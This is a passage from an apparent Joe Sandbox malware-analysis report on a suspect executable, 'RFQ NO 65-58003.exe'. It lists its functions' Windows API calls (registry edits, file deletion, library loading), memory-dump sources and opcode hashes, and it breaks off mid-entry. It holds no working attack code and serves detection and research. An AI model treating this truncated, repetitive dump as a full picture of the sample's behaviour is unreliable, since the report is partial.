                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
                                                              • Instruction ID: 57281eb70c6d5ee4f1dcb93120720bdacd8771e53a80a41a257af2ecf5b7c0f8
                                                              • Opcode Fuzzy Hash: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
                                                              • Instruction Fuzzy Hash: 7C714431D04229DBEF28CF98C844BADBBB1FF44305F11806AD856BB291C7789A96DF44
                                                              Function 00403283 Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00403297
                                                                • Part of subcall function 00403402: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004032CA
                                                              • SetFilePointer.KERNELBASE(00D04381,00000000,00000000,00414ED0,00004000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000), ref: 004033C5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: FilePointer$CountTick
                                                              • String ID:
                                                              • API String ID: 1092082344-0
                                                              • Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                              • Instruction ID: 6f8adcdc05782984f9803186be869087625e4848c31a04748361169110b3332d
                                                              • Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                              • Instruction Fuzzy Hash: 66314A72614205DBD7109F29FEC49663BA9F74039A714423FE900F22E0DBB9AD018B9D
                                                              Function 00402511 Relevance: 4.5, APIs: 3, Instructions: 46registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85
                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402544
                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402557
                                                              • RegCloseKey.ADVAPI32(?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Enum$CloseOpenValue
                                                              • String ID:
                                                              • API String ID: 167947723-0
                                                              • Opcode ID: d2a030f519bef57aeb41d3aabfee9c269b42944cadf78794d8793362519e5dac
                                                              • Instruction ID: bf3b2bcb6287721b49d379c1e5eb9bed13c1d22dc32754f1d9800637ac4e69b6
                                                              • Opcode Fuzzy Hash: d2a030f519bef57aeb41d3aabfee9c269b42944cadf78794d8793362519e5dac
                                                              • Instruction Fuzzy Hash: 44018F71A04204ABE7109FA59E8CABF766CEF40388F10443EF506A61D0EAF84E419629
                                                              Function 004060DF Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,004281E0,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,004281E0,?), ref: 00406109
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,004281E0,?), ref: 0040612A
                                                              • RegCloseKey.ADVAPI32(?,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,004281E0,?), ref: 0040614D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID:
                                                              • API String ID: 3677997916-0
                                                              • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                              • Instruction ID: 5a49725d9b8b462efd799bce316dcbaad7059079bb26d9a6c1e38be835131f9e
                                                              • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                              • Instruction Fuzzy Hash: 2F015A3110020AEACF218F26ED08EDB3BA9EF88391F01403AFD55D6220D774D964CBA5
                                                              Function 004059BB Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00405DC2: GetFileAttributesW.KERNELBASE(?,?,004059C7,?,?,00000000,00405B9D,?,?,?,?), ref: 00405DC7
                                                                • Part of subcall function 00405DC2: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405DDB
                                                              • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405B9D), ref: 004059D6
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,00405B9D), ref: 004059DE
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 004059F6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: File$Attributes$DeleteDirectoryRemove
                                                              • String ID:
                                                              • API String ID: 1655745494-0
                                                              • Opcode ID: 4d7e10e481d95c5c5c7c05f6c7e2fdde8e74fc3924f4c20308c7a9621a850695
                                                              • Instruction ID: bc22120fb0abf4725c7bfcc2d312b2669146bcdc80e6b93b711a22507a8c90f5
                                                              • Opcode Fuzzy Hash: 4d7e10e481d95c5c5c7c05f6c7e2fdde8e74fc3924f4c20308c7a9621a850695
                                                              • Instruction Fuzzy Hash: 29E06572219A9196C2106735590CB5F2998DF86734F054A3BF591B11D0DB7888068A7D
                                                              Function 0040317B Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004031A0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                              • Instruction ID: 40ace49db037ace229a3e5c96781d28ed7fa856bf3440834985399bb1b02b3fc
                                                              • Opcode Fuzzy Hash: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                              • Instruction Fuzzy Hash: 65316B30601219EBDF10DFA5ED84ADA3E68FF04799F20417EF905E6190D7788E509BA9
                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                              • Instruction ID: d65e0694727b7210e6f7bc09f77efd2c0147e56cffd904cd4a2c980f2ed28b93
                                                              • Opcode Fuzzy Hash: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                              • Instruction Fuzzy Hash: 3D01D131724210EBEB195B789D04B2A3698E714314F1089BAF855F62F1DA788C128B5D
                                                              Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85
                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AD
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004023B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CloseDeleteOpenValue
                                                              • String ID:
                                                              • API String ID: 849931509-0
                                                              • Opcode ID: e6a42a97a56624194c1f16ef160d96f75f01f2dbcd79b4c5bc821ba537a64a6e
                                                              • Instruction ID: c0d23e370c25ffca0c370365ac79ff448217ed3cb42859f8984a45efd79f81dd
                                                              • Opcode Fuzzy Hash: e6a42a97a56624194c1f16ef160d96f75f01f2dbcd79b4c5bc821ba537a64a6e
                                                              • Instruction Fuzzy Hash: A8F0C233A04111ABEB10BBB49B8EAAE72699F40348F11447FF602B71C0C9FC4D428669
                                                              Function 00405444 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 00405454
                                                                • Part of subcall function 00404322: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
                                                              • CoUninitialize.COMBASE(00000404,00000000), ref: 004054A0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: InitializeMessageSendUninitialize
                                                              • String ID:
                                                              • API String ID: 2896919175-0
                                                              • Opcode ID: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
                                                              • Instruction ID: 97e24603e1a40a48e39ce2db5dd5886101c9f28e99c3f4bcfc8565b2c6c37521
                                                              • Opcode Fuzzy Hash: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
                                                              • Instruction Fuzzy Hash: 3DF0F076600601CBD31057549E02BAB72A4EFC0306F46407EEE44A23B1D67A48928A6E
                                                              Function 004065EC Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                                • Part of subcall function 0040657C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
                                                                • Part of subcall function 0040657C: wsprintfW.USER32 ref: 004065CE
                                                                • Part of subcall function 0040657C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004065E2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                              • String ID:
                                                              • API String ID: 2547128583-0
                                                              • Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                              • Instruction ID: aacf951b1eba8b902ff867273acd7254ef5911eae3d9513ed99e50af610fe84a
                                                              • Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                              • Instruction Fuzzy Hash: 44E026326046206BC31047705E0893762AC9FC83003020C3EF502F2044CB789C329EAD
                                                              Function 00405DE7 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\RFQ NO 65-58003.exe,80000000,00000003), ref: 00405DEB
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCreate
                                                              • String ID:
                                                              • API String ID: 415043291-0
                                                              • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                              • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
                                                              • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                              • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
                                                              Function 00405DC2 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,?,004059C7,?,?,00000000,00405B9D,?,?,?,?), ref: 00405DC7
                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405DDB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                              • Instruction ID: 952e92710cc69b9b43d0c132b1ebcdc485dc7d738455aa6d22c0503b32111fdc
                                                              • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                              • Instruction Fuzzy Hash: 9DD0C972504520ABC2112728AE0C89BBB55EB542717028B35FAA9A22B0CB304C568A98
                                                              Function 004058BD Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
